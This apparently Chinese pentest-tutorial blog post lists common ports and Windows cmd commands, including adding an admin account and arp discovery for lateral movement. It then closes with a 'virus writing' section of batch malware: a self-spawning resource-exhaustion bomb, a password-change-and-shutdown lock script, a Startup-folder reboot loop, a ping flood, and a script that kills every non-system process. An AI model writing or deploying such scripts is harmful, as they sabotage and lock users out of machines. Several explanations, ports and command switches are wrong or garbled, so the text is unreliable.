渗透测试--web基础之windows（二）：常用命令详解及病毒编写

声明：学习素材来自b站up【泷羽Sec】，侵删，若阅读过程中有相关方面的不足，还请指正，本文只做相关技术分享,切莫从事违法等相关行为，本人一律不承担一切后果

一、常见端口对应的服务

二、常见的cmd命令

1.echo

2.dir (展示当前目录的文件）

3.d: c: 等和cd

4.tree (文件树状图)

6.ipconfig (显示当前的网络状态 IP配置一般用这个命令查看网络本机IP地址，排查网络问题)

7.cls (清屏)

8.copy (复制拼接文件)

9.move (文件移动)

10.ren (重命名)

11.del (删除)

12.ping (一般用于探测主机ip是否存活)

13.type (显示文本文件的内容)

14.reg (注册表)

15.nslookup (探测域名信息)

16.find (查找)

17.tasklist（任务列表显示出当前的进程名称等信息）

18.taskkill （杀死进程）

19.ver, winver （显示版本）

20.start （启动开始命令）

21.systeminfo （查看整个系统的信息）

22.logoff（注销）

23.shutdown（关机）/s /f /t /a /r /g /l

24.telnet（协议工具）

25.arp（自己ip和物理机的映射关系表表）

26.at（定时任务）

27.net（服务）

三、cmd病毒编写

1.资源耗尽病毒

2.锁机病毒

3.无限重启病毒

4.无限发包消耗资源病毒（类ddos）

5.终止进程病毒

6.蓝屏病毒

一、常见端口对应的服务

**端口服务**
21	ftp
23	telnet
80	web
80-89 可能是web	可能是web
443	ssl心脏滴血漏洞以及一些web漏洞测试
445	smb
1433	mysql
1521	oracle
2083/2082	openel 主机管理系统登录（国外使用较多
2222	da虚拟主机管理系统登录（国外）
3128	squid代理默认端口-漫游内网
3306	mysql
3312/3311	kangle主机管理登录系统
3389	远程桌面
5432	postgrsql
5900	vnc（shodan演示）
6379	redis(未授权)
7001、7002	weblogic 默认弱口令，反序列化
7778	kioxo主机控制面板登录
8000-9090	一些常见web端口，有些运维喜欢把管理后台开在非80端口上面
8080	tomcat ,wdcp主机管理系统，默认弱口令
8080，8089，9090	jboss
8083	vestacp 主机管理系统（国外较多）
8649	ganglia
8888	宝塔主机管理默认端口
10000	virtuamin/webmin 服务器虚拟管理系统
11211	memcache 未授权访问
27017、27018	mongodb未授权访问（shodan）
28017	mongodb 统计系统页面

二、常见的cmd命令

1.echo

     echo /? (查看echo的帮助提示)

        echo 1 (输出1)

        echo 1 > 1.txt (输出1并重定向到1.txt文件)

  echo 456789 >> 1.txt (把内容追加到1.txt文件)

如果在用>，它就会把文件覆盖掉。

中文意思就是输出的意思。

2.dir (展示当前目录的文件）

3.d: c: 等和cd

        d: (切换到d盘)cd . (进入当前目录)cd .. (回退到上一级目录)cd /文件夹cd desktop (切换到桌面)

4.tree (文件树状图)

tree /? (查看帮助文档)

/f (显示每个文件夹中的名称)

数据太多了

/a (使用ascii字符，而不使用扩展字符)

tree C:\Users\Administrator /f

tree C:\Users\Administrator /a

(在渗透测试中比较常用)

md是mkdir的缩写（二者作用一致）

md kkk (在当前目录创建名为kkk的文件夹)

rd kkk (删除kkk文件夹)

tab补全功能例如 rd k(tab) 就可以进行文件名补全

6.ipconfig (显示当前的网络状态 IP配置一般用这个命令查看网络本机IP地址，排查网络问题)

ipconfig /all(把所有本机的网络信息打印出来)

7.cls (清屏)

8.copy (复制拼接文件)

copy /? (查看帮助文档)

copy 1.txt ..\1.txt (把文件1.txt复制到上一级目录)

先利用刚刚学的 cd .. 回退到上一级目录再利用dir命令查看文件

copy 1.txt desktop\2.txt (把admin文件夹中的1.txt复制到桌面并重命名为2.txt)

再说一个copy命令的使用方法先echo 123 >1.txt 再echo 456 > 2.txt 然后利用copy 命令 copy 1.txt+2.txt 3.txt

(把1.txt的内容和2.txt的内容拼接起来并重定向到3.txt并改名为3.txt)

9.move (文件移动)

move ..\1.txt 4.txt (把上一级目录中的1.txt移动到本级目录并且重命名为4.txt)

(有人说哎刚刚copy也有这个操作为啥不用copy,因为copy是复制原文件还存在，move是移动，移动了以后上一级目录就不存在我们所移动的文件了)

10.ren (重命名)

ren 4.txt 5.txt (把4.txt重命名为5.txt)

11.del (删除)

del 1.txt 2.txt 3.txt (删除1、2、3.txt文件)
这个命令所删除的文件是永久删除的不会进入回收站

12.ping (一般用于探测主机ip是否存活)

ping /? (查看命令帮助文档)
-t (一直ping)

13.type (显示文本文件的内容)

首先用echo dhaodaodjaodjoadjaodjao >> 1.txt
type 1.txt (查看文件内容)

14.reg (注册表)

reg /? (查看帮助文档)

15.nslookup (探测域名信息)

nslookup www.baidu.com

nslookup -d www.baidu.com (查看历史解析记录)

16.find (查找)

find /? 查看帮助文档

先在1.txt里面输入各种字符串，find "a" 1.txt (在1.txt中查找带a的字段)

find /n "a" 1.txt (查找a参数的字段并排序行号)

type与find结合使用使用 type 1.txt | find "a" (查看1.txt的内容并输出带有a参数的字段)

type 1.txt | find "a" /n (查看1.txt的内容并输出带有a参数的字段并排序行号)

17.tasklist（任务列表显示出当前的进程名称等信息）

18.taskkill （杀死进程）

taskkill /? (查看帮助文档)

常用一般是-pid和-f -t

演示一下首先 calc（计算器）开启一个进程

先用tasklist 查看进程 teskkill /pid 2824 杀死进程可以看见计算器以被杀死

假如遇见杀不掉的进程加一个 /f 参数即可

19.ver, winver （显示版本）

20.start （启动开始命令）

例如 start cmd（打开cmd）

start calc （开启计算器）

start ping www.baidu.com -t（启动ping 并执行-t参数）

21.systeminfo （查看整个系统的信息）

查看一些比较重要的信息比如说补丁信息，后期我们提权就是针对一些不同的修补程序进行一个提权，例如它少打了哪些补丁我们就利用少打的补丁进行提权。（溢出系统提权）

22.logoff（注销）

先logoff /?（查看帮助文档）

logoff（注销，后期提权成功的情况下要远程登陆3389桌面的话，有可能有的机器是链接状态我们可以利用这个命令把对方的远程登陆注销掉）

当然了这个比较暴力也有不用这个命令也可以挤掉对方

23.shutdown（关机）/s /f /t /a /r /g /l

shutdown /?（查看帮助文档）

它的参数很多

shutdown /s（在一分钟内关机）

shutdown /a（计划取消）

shutdown /r（重启）

shutdown /g（在一分钟内关机）

shutdown /r /t 0（-t设置时间设置为0立即执行）

shutdown /s /t 0

shutdown -a 终止进程

24.telnet（协议工具）

控制面板→程序→打开或关闭Windows功能→telnet 客户端勾选

telnet（之前在shodan中思科的设备就是基于这个）

25.arp（自己ip和物理机的映射关系表表）

arp /?（查看帮助文档）

arp -a（假设你以后拿到了一台内网机器你通过这条命令可以查看当前内网有哪些主机以便于横向移动，用于发现同一网络有哪些主机）

26.at（定时任务）

例如我要定时关机 at 时间 "shutdown（关机）/r /t 0"

取消命令 at 1 /delete

27.net（服务）

net stop telent（关闭telent）

net start telnet（打开telent）

net user（查看当前用户）

net user admin 123 /add（添加用户名admin 密码123的用户）

net user admin（查看admin用户权限）

net localgroup administrator admin /add（授权）

net user admin /del（删除用户）

三、cmd病毒编写

1.资源耗尽病毒

bat (脚本文件后缀名.bat)

耗尽资源的bat病毒---》无限弹窗来耗尽cpu资源

echo start cmd>1. txt

echo %0>>1.txt

ren 1.txt 1. bat

原理剖析：

echo start cmd>1.txt：

这个命令的意思是将文本 start cmd 写入一个名为 1.txt 的文件中。
echo 命令用于输出文本，> 符号表示将输出重定向到文件中（如果文件已存在则会覆盖原文件）。

echo %0>>1.txt：

这里的 %0 是一个特殊变量，代表无限点击。
>> 符号表示将输出追加到 1.txt 文件的末尾，而不是覆盖。
所以这个命令会将当前批处理文件的名称追加到 1.txt 中。

ren 1.txt 1.bat：

这个命令用来重命名文件，将 1.txt 重命名为 1.bat。
ren 是重命名的命令。

2.锁机病毒

echo net user administrator 123456>c:windows \Temp \1. bat

echo shutdown /n/t 0>>c:\windows \Temp\1. bat

原理：当运行 1.bat 文件时，它会首先将管理员帐户的密码更改为 123456（如果具有相应的权限），然后立即关闭计算机。再次登录就被锁机

3.无限重启病毒

echo shutdown /n/t 0>C:\windowS \Temp 1. bat copy c:windows \ Temp\1.bat "%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start Menu\Programs\Startup\"

原理：

创建关机脚本：首先，系统会在 C:\windows\Temp\ 下创建一个批处理文件 1.bat，这个文件的内容是命令 shutdown /s /t 0，因此它会立即关机。
自启动设置：然后将这个批处理文件复制到用户的启动文件夹中。这样，每次用户登录到 Windows 时，1.bat 都会自动执行，导致系统立即关机。

4.无限发包消耗资源病毒（类ddos）

echo ping www.com -t > C:\windows \Temp \1. bat

echo shutdown /r /t 0 >> C:\windows \Temp

echo %0 >> 1.bat

copy c:windows\Temp\1.bat

"%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start Menu\Programs\Startup\"

5.终止进程病毒

@echo off
:: 脚本会关闭所有用户自定义进程，保持必要的系统进程
for /f "tokens=1" %%i in ('tasklist ^| findstr /v /i "System Idle Process" ^| findstr /v /i "Windows" ^| findstr /v /i "System" ^| findstr /v /i "services.exe" ^| findstr /v /i "svchost.exe"') do (
echo Terminating process %%i
taskkill /F /PID %%i
)

echo All non-system processes terminated.
pause

原理：

@echo off: 禁用命令回显，使输出更干净。
for /f: 遍历任务列表中的每一行，使用 tasklist 命令获取进程列表。
findstr: 过滤掉那些你不想结束的系统进程，包括 “System Idle Process”、“Windows”、“System”、“services.exe” 和 “svchost.exe”。
taskkill /F /PID: 强制结束选定的进程。